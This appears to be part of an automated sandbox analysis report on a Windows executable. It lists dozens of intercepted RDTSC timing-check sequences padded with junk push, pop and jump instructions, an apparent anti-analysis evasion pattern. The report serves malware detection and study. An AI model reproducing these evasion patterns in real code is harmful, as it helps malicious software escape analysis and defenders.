Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 73FC04 second address: 73FC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 je 00007FC3507E5376h 0x0000000c jmp 00007FC3507E5381h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F605 second address: 74F613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F613 second address: 74F617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F617 second address: 74F61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F61B second address: 74F673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5386h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c ja 00007FC3507E5376h 0x00000012 jp 00007FC3507E5376h 0x00000018 pop edx 0x00000019 jng 00007FC3507E5383h 0x0000001f jmp 00007FC3507E537Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC3507E5387h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 74F673 second address: 74F679 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67857A second address: 678581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 678581 second address: 67858A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67858A second address: 67858E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75701D second address: 75705C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC350C3E729h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75B613 second address: 75B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75B617 second address: 75B638 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC350C3E725h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75B799 second address: 75B7A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3507E5376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 75BA6C second address: 75BA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7605BB second address: 7605DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC3507E5388h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7601C9 second address: 7601CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7601CF second address: 7601D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFB1 second address: 76BFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFB7 second address: 76BFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFBB second address: 76BFC1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFC1 second address: 76BFF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3507E5386h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 76BFF7 second address: 76BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 77E85B second address: 77E85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 77E85F second address: 77E863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79A4D8 second address: 79A4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5383h 0x00000009 ja 00007FC3507E537Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79A4FB second address: 79A500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7994E2 second address: 7994E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7997F1 second address: 7997F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7997F5 second address: 799818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3507E5387h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799818 second address: 79981C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799974 second address: 79997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79997C second address: 799982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799DC4 second address: 799DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799DC8 second address: 799DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E721h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FC350C3E728h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799DFB second address: 799E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5385h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799E15 second address: 799E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC350C3E727h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC350C3E71Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799E43 second address: 799E4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 799F8F second address: 799F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D13E second address: 79D143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D143 second address: 79D14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D14B second address: 79D163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC3507E537Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 79D163 second address: 79D169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7A2D14 second address: 7A2D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7A2D18 second address: 7A2D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 7A2D1C second address: 7A2D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0053 second address: 54D0085 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FC350C3E729h 0x00000012 jmp 00007FC350C3E71Bh 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0085 second address: 54D00C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FC3507E5380h 0x00000011 xor eax, 56B42A58h 0x00000017 jmp 00007FC3507E537Bh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D00C6 second address: 54D0105 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC350C3E727h 0x00000011 pop esi 0x00000012 call 00007FC350C3E729h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54900C9 second address: 5490138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC3507E5383h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC3507E537Bh 0x0000001b jmp 00007FC3507E5383h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FC3507E5388h 0x00000027 and esi, 09EE1B38h 0x0000002d jmp 00007FC3507E537Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0991 second address: 54B0997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0997 second address: 54B099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B099B second address: 54B099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0551 second address: 54B0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0555 second address: 54B0572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0572 second address: 54B05AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov edx, 719C99DEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FC3507E5382h 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3507E5387h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0253 second address: 54B0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0259 second address: 54B025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0F47 second address: 54B0F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC350C3E71Ch 0x00000012 xor al, 00000008h 0x00000015 jmp 00007FC350C3E71Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0F87 second address: 54B0FD8 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007FC3507E5383h 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007FC3507E5389h 0x00000017 add si, ED86h 0x0000001c jmp 00007FC3507E5381h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 55004E3 second address: 5500508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5500508 second address: 550050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 550050E second address: 5500512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5500512 second address: 5500516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 5500516 second address: 5500529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 23982EBDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D04A8 second address: 54D04E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC3507E537Ch 0x00000013 jmp 00007FC3507E5385h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D04E3 second address: 54D0501 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 mov ch, 4Eh 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC350C3E71Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0501 second address: 54D0505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D0505 second address: 54D050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D050B second address: 54D055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007FC3507E5384h 0x0000000b sbb ax, 7C08h 0x00000010 jmp 00007FC3507E537Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC3507E5386h 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D055A second address: 54D055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D055E second address: 54D057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0305 second address: 54B0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0309 second address: 54B030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B030F second address: 54B0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0315 second address: 54B0319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0319 second address: 54B03B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC350C3E722h 0x00000010 xor esi, 357ABB08h 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b popfd 0x0000001c jmp 00007FC350C3E728h 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, di 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC350C3E720h 0x00000032 adc ah, FFFFFFC8h 0x00000035 jmp 00007FC350C3E71Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FC350C3E728h 0x00000041 adc si, B228h 0x00000046 jmp 00007FC350C3E71Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B03B6 second address: 54B03F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1992C8CAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC3507E5387h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC3507E5385h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0EBD second address: 54C0ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0ECD second address: 54C0F07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FC3507E5386h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3507E537Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0F07 second address: 54C0F16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0F16 second address: 54C0F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5384h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54D02C7 second address: 54D02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0720 second address: 54F0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F0726 second address: 54F079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FC350C3E726h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FC350C3E720h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push edx 0x0000001a mov bh, ch 0x0000001c pop edx 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f jmp 00007FC350C3E720h 0x00000024 push eax 0x00000025 jmp 00007FC350C3E71Bh 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FC350C3E726h 0x00000030 mov eax, dword ptr [773265FCh] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F079F second address: 54F07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07A3 second address: 54F07A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07A9 second address: 54F07AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54F07AF second address: 54F07B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
